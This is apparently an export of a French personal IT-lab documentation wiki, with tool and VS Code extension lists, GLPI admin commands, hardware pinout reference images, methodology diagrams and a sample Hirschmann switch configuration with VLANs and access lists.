</td><td>Visual Studio Code</td><td>[Download Visual Studio Code - Mac, Linux, Windows](https://code.visualstudio.com/download)</td></tr><tr><td>Réseau / simulation réseau

</td><td>Cisco packet tracer</td><td>[Cisco Packet Tracer - Networking Simulation Tool (netacad.com)](https://www.netacad.com/courses/packet-tracer)</td></tr><tr><td></td><td>GNS3</td><td>[GNS3 Documentation | GNS3 Documentation](https://docs.gns3.com/)</td></tr><tr style="height:57.7812px;"><td style="height:57.7812px;">Security / Pentesting

</td><td style="height:57.7812px;">Kalilinux</td><td style="height:57.7812px;">[Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution](https://www.kali.org/)</td></tr><tr style="height:35.3906px;"><td style="height:35.3906px;"></td><td style="height:35.3906px;">PingCastle</td><td style="height:35.3906px;">[Home - PingCastle](https://www.pingcastle.com/)</td></tr></tbody></table>

---

### <span style="text-decoration:underline;">**Autres**</span>

<table id="bkmrk-type-nom-lien-t%C3%A9l%C3%A9ph" style="border-collapse:collapse;width:100%;"><colgroup><col style="width:25.7421%;"></col><col style="width:32.1777%;"></col><col style="width:42.0693%;"></col></colgroup><tbody><tr><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;">Type

</td><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;">Nom</td><td class="align-center" style="background-color:rgb(194,224,244);vertical-align:middle;">Lien</td></tr><tr><td>Téléphonie / VOIP</td><td>Audiocode</td><td>[AudioCodes - Voice DNA for the digital workplace](https://www.audiocodes.com/)</td></tr><tr><td> </td><td>Asterisk</td><td>[Home ⋆ Asterisk](https://www.asterisk.org/)</td></tr><tr><td>  
</td><td>Issabel</td><td>  
</td></tr><tr><td>VidéoSurveillance</td><td>Milestone</td><td>[Global leading provider of video management | Milestone Systems](https://www.milestonesys.com/)</td></tr><tr><td>  
</td><td>ZoneMinder</td><td>[ZoneMinder - ZoneMinder Cloud - /index.html](https://cloud.zoneminder.com/)</td></tr><tr><td>  
</td><td>  
</td><td>  
</td></tr></tbody></table>

# Dev & Scripting

# DEV - Niveaux des languages de programation

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2025-03/scaled-1680-/30aimage.png)](https://docs.labs404.fr/uploads/images/gallery/2025-03/30aimage.png)

# DEV - Tables ASSCI

[![ascii1de2.png](https://docs.labs404.fr/uploads/images/gallery/2022-11/scaled-1680-/ascii1de2.png)](https://docs.labs404.fr/uploads/images/gallery/2022-11/ascii1de2.png)

[![ascii2de2.png](https://docs.labs404.fr/uploads/images/gallery/2022-11/scaled-1680-/ascii2de2.png)](https://docs.labs404.fr/uploads/images/gallery/2022-11/ascii2de2.png)

# Infra

# Cloud - Niveau de service

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-08/scaled-1680-/CAdimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-08/CAdimage.png)

*Source : IT-Connect*

# VSCA - Hiérarche des droits

[![hyerarchiedroitsvcsa.webp](https://docs.labs404.fr/uploads/images/gallery/2022-11/scaled-1680-/hyerarchiedroitsvcsa.webp)](https://docs.labs404.fr/uploads/images/gallery/2022-11/hyerarchiedroitsvcsa.webp)

# IoT

# IoT - Arduino GPIO

<details id="bkmrk-arduino-nano"><summary>Arduino Nano</summary>

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/rcRimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/rcRimage.png)

</details>

# IOT - Raspberry PI GPIO

<details id="bkmrk-4b%2B"><summary>4B+</summary>

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/ncYimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/ncYimage.png)

</details>

# Applications & CMS

# VScode - catalogue d'extensions

Voici la liste des paquets que j'utilise dans mon environnement à titre informatif :

<table border="1" id="bkmrk-ansible-c%2Fc%2B%2B-docker" style="border-collapse: collapse; width: 100%; height: 1673.23px;"><colgroup><col style="width: 27.6191%;"></col><col style="width: 72.381%;"></col></colgroup><tbody><tr style="height: 76.6px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 76.6px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/4NIimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/4NIimage.png)</td><td style="border-style: hidden; vertical-align: middle; height: 76.6px;">Ansible

</td></tr><tr style="height: 71.5px;"><td style="border-style: hidden; vertical-align: middle; height: 71.5px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/7hjimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/7hjimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 71.5px;">Debugger Bash

</td></tr><tr style="height: 68.0167px;"><td style="border-style: hidden; vertical-align: middle; height: 68.0167px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/WYQimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/WYQimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 68.0167px;">Snippets pour scripting Bash

</td></tr><tr style="height: 66.6333px;"><td style="border-style: hidden; vertical-align: middle; height: 66.6333px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Paiimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/Paiimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 66.6333px;">Debug d'appli en container

</td></tr><tr style="height: 69.75px;"><td style="border-style: hidden; vertical-align: middle; height: 69.75px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/WBbimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/WBbimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 69.75px;">Permet d'ouvrer des espaces de dev dans des containers

</td></tr><tr style="height: 77.3333px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 77.3333px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/f0Bimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/f0Bimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 77.3333px;">C/C++  
</td></tr><tr style="height: 73.05px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 73.05px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/Bmbimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/Bmbimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 73.05px;">Docker  
</td></tr><tr style="height: 72.9px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 72.9px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/1zJimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/1zJimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 72.9px;">Edit csv  
</td></tr><tr style="height: 64.8333px;"><td style="border-style: hidden; vertical-align: middle; height: 64.8333px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2024-03/scaled-1680-/876image.png)](https://docs.labs404.fr/uploads/images/gallery/2024-03/876image.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 64.8333px;">Git Extension Pack</td></tr><tr style="height: 59.7833px;"><td style="border-style: hidden; vertical-align: middle; height: 59.7833px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2024-03/scaled-1680-/rRoimage.png)](https://docs.labs404.fr/uploads/images/gallery/2024-03/rRoimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 59.7833px;">Git Graph</td></tr><tr style="height: 75.35px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 75.35px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/7aVimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/7aVimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 75.35px;">HTML5 extension pack  
</td></tr><tr style="height: 71.1167px;"><td style="border-style: hidden; vertical-align: middle; height: 71.1167px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/MU0image.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/MU0image.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 71.1167px;">Web server live</td></tr><tr style="height: 59.2667px;"><td style="border-style: hidden; vertical-align: middle; height: 59.2667px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2024-03/scaled-1680-/5c0image.png)](https://docs.labs404.fr/uploads/images/gallery/2024-03/5c0image.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 59.2667px;">Markdown Preview Github Styling</td></tr><tr style="height: 70.95px;"><td style="border-style: hidden; vertical-align: middle; height: 70.95px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/0iVimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/0iVimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 70.95px;">Extension pour utiliser des modèles locaux avec Ollama</td></tr><tr style="height: 77.7833px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 77.7833px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/fpAimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/fpAimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 77.7833px;">PowerShell  
</td></tr><tr style="height: 76.1px;"><td class="align-right" style="border-style: hidden; vertical-align: middle; height: 76.1px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/tABimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/tABimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 76.1px;"> Prettier</td></tr><tr style="height: 71.7px;"><td style="border-style: hidden; vertical-align: middle; height: 71.7px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Cifimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/Cifimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 71.7px;">Permet de manager les différents projets</td></tr><tr style="height: 74.3667px;"><td style="border-style: hidden; vertical-align: middle; height: 74.3667px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Ukvimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/Ukvimage.png)

</td><td rowspan="4" style="border-style: hidden; vertical-align: middle; height: 288.85px;">Package d’extensions pour coder en python et utiliser des Venvs.</td></tr><tr style="height: 72.2667px;"><td style="border-style: hidden; vertical-align: middle; height: 72.2667px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/m4Eimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/m4Eimage.png)

</td></tr><tr style="height: 70.7167px;"><td style="border-style: hidden; vertical-align: middle; height: 70.7167px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/ucMimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/ucMimage.png)

</td></tr><tr style="height: 71.5px;"><td style="border-style: hidden; vertical-align: middle; height: 71.5px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/AoGimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/AoGimage.png)

</td></tr><tr style="height: 76.5333px;"><td style="border-style: hidden; vertical-align: middle; height: 76.5333px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/zpoimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/zpoimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 76.5333px;">Plugin utilitaire pour le CSV</td></tr><tr style="height: 28.8px;"><td style="border-style: hidden; vertical-align: middle; height: 28.8px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/cY6image.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/cY6image.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 28.8px;">Permet la connexion à des environnements distants</td></tr><tr><td style="border-style: hidden; vertical-align: middle;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/NEcimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/NEcimage.png)

</td><td style="border-style: hidden; vertical-align: middle;">Linter pour les scripts shell</td></tr><tr><td style="border-style: hidden; vertical-align: middle;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/Cerimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/Cerimage.png)

</td><td style="border-style: hidden; vertical-align: middle;">Extension pour utiliser WSL</td></tr><tr style="height: 76.3833px;"><td style="border-style: hidden; vertical-align: middle; height: 76.3833px;">[![image.png](https://docs.labs404.fr/uploads/images/gallery/2023-11/scaled-1680-/wAAimage.png)](https://docs.labs404.fr/uploads/images/gallery/2023-11/wAAimage.png)

</td><td style="border-style: hidden; vertical-align: middle; height: 76.3833px;">YAML  
</td></tr></tbody></table>

# GLPI - lignes de commandes

<p class="callout warning">**Attention** : Pour exécuter les commandes suivantes, se placer préalablement à la racine du dossier web GLPI.</p>

Voici un ensemble des commandes pouvant être utilisées en ligne de commande.

Vérifier les prérequis à l'installation :

```bash
php bin/console glpi:system:check_requirements
```

---

Initialiser la base de données :

```bash
php bin/console db:install --db-host=<ip ou hostname> --db-port=3306 --db-name=glpi --db-user=glpi --db-password=<mot de passe> --default-language=fr_FR
```

---

Mettre à jour la base de données (suite à un update GLPI) :

```bash
php bin/console db:update
```

---

Activer, désactiver le mode de maintenance :

```
glpi:maintenance:enable
```

```bash
glpi:maintenance:disable
```

---

Vérifier l'intégrité de la base :

```bash
php bin/console db:check_schema_integrity
```

---

Pour plus de commandes, voir sur la documentation officielle : [https://glpi-install.readthedocs.io/fr/latest/command-line.html](https://glpi-install.readthedocs.io/fr/latest/command-line.html)

# Matériel

# Hardware - Connectique série & LTP

##### <span style="text-decoration:underline;">DB9 to DB9</span>

<span style="text-decoration:underline;">[![db9db9.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/db9db9-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/db9db9-png.png)</span>

---

---

##### <span style="text-decoration:underline;">DB25 to DB25</span>

<span style="text-decoration:underline;">[![db25db25.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/db25db25-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/db25db25-png.png)</span>

---

##### <span style="text-decoration:underline;">DB9 to DB25</span>

<span style="text-decoration:underline;">[![db9db25.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/db9db25-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/db9db25-png.png)</span>

---

##### <span style="text-decoration:underline;">RJ45 to DB9</span>

<span style="text-decoration:underline;">[![rj45db9.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/rj45db9-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/rj45db9-png.png)</span>

# Hardware - Layout claviers

##### <span style="text-decoration:underline;">Francais - Azerty</span>

<span style="text-decoration:underline;">[![azerty.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/azerty-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/azerty-png.png)</span>

---

##### <span style="text-decoration:underline;">Anglais - Qwerty</span>

<span style="text-decoration:underline;">[![qwerty.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/qwerty-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/qwerty-png.png)</span>

---

##### <span style="text-decoration:underline;">Allemand - Qwertz</span>

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/oMtimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/oMtimage-png.png)

# Hardware - Tensions PSU molex

[![molex.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/molex-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/molex-png.png)

# Méthodologie

Contient des ressources de méthodologie.

# Méthodologie - Choisir son annexe

Voici un schéma pour vous aider à choisir le type d’annexe que vous souhaitez intégrer dans votre document, ainsi que comment le mettre en forme :

[![choixannexe.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/choixannexe-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/choixannexe-png.png)

# Méthodologie - Définir la priorité

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wznimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wznimage-png.png)

# Méthodologie - Méthode PDCA

<div drawio-diagram="277"><img src="https://docs.labs404.fr/uploads/images/drawio/2026-07/drawing-1-1756451832-png.png" alt="drawing-1-1756451832.png"/></div>

# Méthodologie - Modèles d'architecture

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/YWWimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/YWWimage-png.png)

# Méthodologie - Taxonomie de Bloom

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wWpimage-png.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/wWpimage-png.png)

# Méthodologie - Interaction IA

[![image.png](https://docs.labs404.fr/uploads/images/gallery/2026-07/scaled-1680-/ryNimage.png)](https://docs.labs404.fr/uploads/images/gallery/2026-07/ryNimage.png)

# Méthodologie - Architectures connectées

Voici trois exemples d'architectures connectées :

### <span style="text-decoration: underline; color: rgb(52, 73, 94);">**I. La ville connectée**</span>

[![Ville_Connectee.png](https://docs.labs404.fr/uploads/images/gallery/2026-08/scaled-1680-/ville-connectee.png)](https://docs.labs404.fr/uploads/images/gallery/2026-08/ville-connectee.png)

---

### <span style="text-decoration: underline; color: rgb(52, 73, 94);">**II. L'usine connectée**</span>

[![Usine_connectee.png](https://docs.labs404.fr/uploads/images/gallery/2026-08/scaled-1680-/usine-connectee.png)](https://docs.labs404.fr/uploads/images/gallery/2026-08/usine-connectee.png)

# Réseau

# Hirschmann - Exemple configuration

```
! GRS1042-6T6Z Configuration

! Version: HiOS-3A-08.6.00

! Build Date: 2021-01-14 12:51

network hidiscovery mode read-only 
no network hidiscovery operation 
network management access web timeout 30 
network out-of-band parms 10.10.10.1 255.255.255.0 0.0.0.0 
network out-of-band protocol none 
network management access add 2 
network management access add 3 
network management access add 4 
network management access modify 1 ip 10.10.10.0 
network management access modify 2 ip 192.168.33.59 
network management access modify 3 ip 192.168.7.247 
network management access modify 4 ip 192.168.7.248 
network management access modify 1 mask 24 
network management access modify 2 mask 32 
network management access modify 3 mask 32 
network management access modify 4 mask 32 
network management access modify 1 http disable 
network management access modify 2 http disable 
network management access modify 3 http disable 
network management access modify 4 http disable 
network management access modify 1 snmp disable 
network management access modify 2 snmp disable 
network management access modify 3 snmp disable 
network management access modify 1 telnet disable 
network management access modify 2 telnet disable 
network management access modify 3 telnet disable 
network management access modify 4 telnet disable 
network management access modify 1 iec61850-mms disable 
network management access modify 2 iec61850-mms disable 
network management access modify 3 iec61850-mms disable 
network management access modify 4 iec61850-mms disable 
network management access modify 1 modbus-tcp disable 
network management access modify 2 modbus-tcp disable 
network management access modify 3 modbus-tcp disable 
network management access modify 4 modbus-tcp disable 
network management access modify 1 ethernet-ip disable 
network management access modify 2 ethernet-ip disable 
network management access modify 3 ethernet-ip disable 
network management access modify 4 ethernet-ip disable 
network management access modify 1 profinet-io disable 
network management access modify 2 profinet-io disable 
network management access modify 3 profinet-io disable 
network management access modify 4 profinet-io disable 

vlan database
vlan add 30
vlan add 31
vlan add 32
vlan add 33
vlan add 39
name 30 encodeurs 
name 31 cameras 
name 32 admin 
name 33 video 
name 39 interco 
routing add 30 
routing add 31 
routing add 32 
routing add 33 
routing add 39 
igmp-snooping vlan-id 30 mode 
igmp-snooping vlan-id 31 mode 
igmp-snooping vlan-id 30 querier mode 
igmp-snooping vlan-id 31 querier mode 
exit
network management vlan 32 
network parms 0.0.0.0 0.0.0.0 0.0.0.0 
network protocol none 
! dot1x mac-authentication-bypass password  ""
configure
device-status monitor link-failure 
device-status monitor ring-redundancy 
device-status monitor module-removal 
device-status module 2 enable 
device-status module 3 enable 
mrp domain add default-domain
mrp domain modify port secondary 1/2 fixed-backup disable 
mrp domain modify advanced-mode enable 
mrp domain modify manager-priority 32768 
mrp domain modify mode client 
mrp domain modify name "" 
mrp domain modify recovery-delay 200ms 
mrp domain modify vlan 0 
mrp domain modify operation enable 
mrp operation enable 
no dns cache adminstate 
no dns client cache adminstate 
clock summer-time mode recurring 
clock summer-time recurring start last sun mar 02:00 
clock summer-time recurring end last sun oct 03:00 
config remote-backup operation 
config remote-backup destination ftp://192.168.33.59/Hirschmann/SW601X.xml 
! config remote-backup username ****** 
! config remote-backup password ****** 
config envm auto-update sd disable 
config envm auto-update usb disable 
config envm config-save sd disable 
config envm config-save usb disable 
config envm sshkey-auto-update sd disable 
config envm sshkey-auto-update usb disable 
no http server 
igmp-snooping forward-unknown query-ports 
igmp-snooping mode 
igmp-snooping querier mode 
monitor session 1 destination interface 1/8 
monitor session 1 source interface 3/8 operation enable
monitor session 1 source interface 3/8 direction txrx 
monitor session 1 mode enable 
ip routing 
ip vrrp operation 
ip vrrp trap auth-failure 
ip vrrp trap new-master 
ip vrrp domain 1 member-advertisement enable 
ip vrrp domain 2 member-advertisement enable 
ip vrrp domain 3 member-advertisement enable 
ip vrrp domain 4 member-advertisement enable 
ip vrrp domain 6 member-advertisement enable 
ip default-route add 192.168.39.249
passwords max-login-attempts 5 
passwords min-length 8 
ptp v2-transparent-clock vlan-priority 4 
no inlinepower operation 
security-status monitor pwd-policy-inactive 
security-status monitor extnvm-upd-enabled 
security-status monitor no-link-enabled 
security-status monitor sysmon-enabled 
security-status trap 
sntp client server add 1 192.168.33.1 port 123 description "NTP SE BPNL" 
sntp client server mode 1 enable 
sntp client operation 
sntp client request-interval 3600 
spanning-tree forceversion mstp 
spanning-tree forward-time 4 
spanning-tree hello-time 1 
spanning-tree max-age 6 
spanning-tree mst instance add 1 
spanning-tree mst instance modify 0 priority 36864 
spanning-tree mst instance modify 1 priority 32768 
spanning-tree mst instance modify 1 vlan add 33
spanning-tree mst instance modify 1 vlan add 39
spanning-tree configuration name BPNL 
spanning-tree configuration revision 30 
system location "Switch federateur : Site X" 
system name SW601X 

snmp trap add "Zabbix" 192.168.7.248:162
snmp trap mode Zabbix enable 
mac notification operation 
mac notification interval 60 
ip access-list extended name Vlan31_IN index 3 permit src 238.0.0.0-0.255.255.255 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 4 permit src 172.20.0.0-0.0.255.255 dst 238.0.0.0-0.255.255.255
ip access-list extended name Vlan31_IN index 5 permit src 10.100.0.0-0.0.0.255 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 6 permit src 172.20.0.0-0.0.255.255 dst 10.100.0.0-0.0.0.255
ip access-list extended name Vlan31_IN index 7 permit src 10.2.0.0-0.0.0.255 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 8 permit src 172.20.0.0-0.0.255.255 dst 10.2.0.0-0.0.0.255
ip access-list extended name Vlan31_IN index 9 permit src 10.242.2.0-0.0.0.255 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 10 permit src 172.20.0.0-0.0.255.255 dst 10.242.2.0-0.0.0.255
ip access-list extended name Vlan31_IN index 11 permit src 192.168.33.1-0.0.0.0 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 12 permit src 172.20.0.0-0.0.255.255 dst 192.168.33.1-0.0.0.0
ip access-list extended name Vlan31_IN index 13 permit src 192.168.33.59-0.0.0.0 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 14 permit src 172.20.0.0-0.0.255.255 dst 192.168.33.59-0.0.0.0
ip access-list extended name Vlan31_IN index 15 permit src 192.168.7.247-0.0.0.0 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 16 permit src 172.20.0.0-0.0.255.255 dst 192.168.7.247-0.0.0.0
ip access-list extended name Vlan31_IN index 17 permit src 192.168.7.248-0.0.0.0 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan31_IN index 18 permit src 172.20.0.0-0.0.255.255 dst 192.168.7.248-0.0.0.0
ip access-list extended name Vlan32_IN index 1 permit src any dst 224.0.0.0-0.255.255.255
ip access-list extended name Vlan32_IN index 2 permit src 192.168.32.0-0.0.0.255 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 3 permit src 10.100.0.0-0.0.0.255 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 4 permit src 192.168.32.0-0.0.0.255 dst 10.100.0.0-0.0.0.255
ip access-list extended name Vlan32_IN index 5 permit src 10.2.0.0-0.0.0.255 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 6 permit src 192.168.32.0-0.0.0.255 dst 10.2.0.0-0.0.0.255
ip access-list extended name Vlan32_IN index 7 permit src 10.2.0.0-0.0.0.255 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 8 permit src 192.168.32.0-0.0.0.255 dst 10.2.0.0-0.0.0.255
ip access-list extended name Vlan32_IN index 9 permit src 10.242.2.0-0.0.0.255 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 10 permit src 192.168.32.0-0.0.0.255 dst 10.242.2.0-0.0.0.255
ip access-list extended name Vlan32_IN index 11 permit src 192.168.33.1-0.0.0.0 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 12 permit src 192.168.32.0-0.0.0.255 dst 192.168.33.1-0.0.0.0
ip access-list extended name Vlan32_IN index 13 permit src 192.168.33.59-0.0.0.0 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 14 permit src 192.168.32.0-0.0.0.255 dst 192.168.33.59-0.0.0.0
ip access-list extended name Vlan32_IN index 15 permit src 192.168.7.247-0.0.0.0 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 16 permit src 192.168.32.0-0.0.0.255 dst 192.168.7.247-0.0.0.0
ip access-list extended name Vlan32_IN index 17 permit src 192.168.7.248-0.0.0.0 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan32_IN index 18 permit src 192.168.32.0-0.0.0.255 dst 192.168.7.248-0.0.0.0
ip access-list extended name Vlan33_IN index 1 permit src any dst 224.0.0.0-0.255.255.255
ip access-list extended name Vlan33_IN index 2 permit src 192.168.33.0-0.0.0.255 dst 192.168.33.0-0.0.0.255
ip access-list extended name Vlan33_IN index 3 permit src 10.100.0.0-0.0.0.255 dst 192.168.33.0-0.0.0.255
ip access-list extended name Vlan33_IN index 4 permit src 192.168.33.0-0.0.0.255 dst 10.100.0.0-0.0.0.255
ip access-list extended name Vlan33_IN index 5 permit src 10.2.0.0-0.0.0.255 dst 192.168.33.0-0.0.0.255
ip access-list extended name Vlan33_IN index 6 permit src 192.168.33.0-0.0.0.255 dst 10.2.0.0-0.0.0.255
ip access-list extended name Vlan33_IN index 7 permit src 10.242.2.0-0.0.0.255 dst 192.168.33.0-0.0.0.255
ip access-list extended name Vlan33_IN index 8 permit src 192.168.33.0-0.0.0.255 dst 10.242.2.0-0.0.0.255
ip access-list extended name Vlan33_IN index 9 permit src 192.168.7.247-0.0.0.0 dst 192.168.33.0-0.0.0.255
ip access-list extended name Vlan33_IN index 10 permit src 192.168.33.0-0.0.0.255 dst 192.168.7.247-0.0.0.0
ip access-list extended name Vlan33_IN index 11 permit src 192.168.7.248-0.0.0.0 dst 192.168.33.0-0.0.0.255
ip access-list extended name Vlan33_IN index 12 permit src 192.168.33.0-0.0.0.255 dst 192.168.7.248-0.0.0.0
ip access-list extended name Vlan33_IN index 13 permit src 192.168.1.0-0.0.0.255 dst 192.168.33.1-0.0.0.0
ip access-list extended name Vlan33_IN index 14 permit src 192.168.33.1-0.0.0.0 dst 192.168.1.0-0.0.0.255
ip access-list extended name Vlan33_IN index 15 permit src 172.20.0.0-0.0.255.255 dst 192.168.33.1-0.0.0.0
ip access-list extended name Vlan33_IN index 16 permit src 192.168.33.1-0.0.0.0 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan33_IN index 17 permit src 192.168.32.0-0.0.0.255 dst 192.168.33.1-0.0.0.0
ip access-list extended name Vlan33_IN index 18 permit src 192.168.33.1-0.0.0.0 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan33_IN index 19 permit src 192.168.1.0-0.0.0.255 dst 192.168.33.59-0.0.0.0
ip access-list extended name Vlan33_IN index 20 permit src 192.168.33.59-0.0.0.0 dst 192.168.1.0-0.0.0.255
ip access-list extended name Vlan33_IN index 21 permit src 172.20.0.0-0.0.255.255 dst 192.168.33.59-0.0.0.0
ip access-list extended name Vlan33_IN index 22 permit src 192.168.33.59-0.0.0.0 dst 172.20.0.0-0.0.255.255
ip access-list extended name Vlan33_IN index 23 permit src 192.168.32.0-0.0.0.255 dst 192.168.33.59-0.0.0.0
ip access-list extended name Vlan33_IN index 24 permit src 192.168.33.59-0.0.0.0 dst 192.168.32.0-0.0.0.255
ip access-list extended name Vlan33_IN index 25 permit src 192.168.28.5-0.0.0.0 dst 192.168.33.11-0.0.0.0
ip access-list extended name Vlan33_IN index 26 permit src 192.168.33.11-0.0.0.0 dst 192.168.28.5-0.0.0.0
